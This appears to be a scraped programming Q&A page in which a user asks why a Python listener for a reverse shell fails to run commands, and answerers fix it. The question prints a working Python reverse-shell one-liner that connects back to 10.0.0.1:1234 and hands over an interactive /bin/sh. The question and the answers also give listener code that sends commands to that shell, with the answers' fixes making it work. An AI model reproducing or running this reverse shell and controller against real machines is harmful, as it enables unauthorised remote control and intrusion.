Home > front end >  bash shell and python server to send commands
bash shell and python server to send commands

Time:01-09

I had a doubt regarding one of my reverse shell I tried locally :

After trying manually the steps to get an interactive shell with the following reverse shell :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

_

I tried to do a python server that would automate this :

# coding: utf-8

import socket

socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.bind(('', 1234))
socket.listen(1)
client, address = socket.accept()
print "{} connected".format( address )

while True:
        print(client.recv(2048)) # this showed me I had a shell
        client.send(input("").encode('utf-8'))

client.close()
stock.close()

Can someone figure out why my commands are not executed but the shell is launched (client side)?

Thanks.

CodePudding user response:

    client.send(input("").encode('utf-8'))

input will strip the newline from the input it read. The shell though is expecting a command to end with a newline. The fix is thus to add the missing newline:

    client.send(input("").encode('utf-8')   b"\n")

CodePudding user response:

  • First, the variable names should not be the same as the library names.
  • The server first expects some data, but there is no data to come. That's why the problem occurs.
  • Since you are connecting directly to the shell, you must use a newline specifier, i.e. '\n' every time data is sent
  • Each time data is sent, you have to wait a little while to fetch the data. If you don't wait, there will be a problem because you are trying to pull the data before the code is run on the other side.
  • You need to decode the incoming data
  • Closing the client and socket will not work. Because it will never exit the while loop and the codes below will not work. You can do a check for output for that. For example, when you type 'exit', the loop will end.

The code should be at least like this:

import socket
import time

def interact(client):
    command=''
    while(command != 'exit'):
        command=input('$ ')
        client.send((command   '\n').encode('utf-8'))
        time.sleep(0.5)
        print client.recv(2048).decode('utf-8')
    client.close()
    return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 1234))
s.listen(1)
client, addr = s.accept()
print "{} connected".format( addr )
interact(client)

Page link:https//www.codepudding.com/frontend/256313.html

Prev:Android Studio Git works weird I think?
Next:How do I send to an IP address with PF_PACKET?
  •  Tags:  
  • Related

About Us:  Contact Us      Terms of Service       Privacy Policy

Copyright © 2010-2023,Powered By CodePudding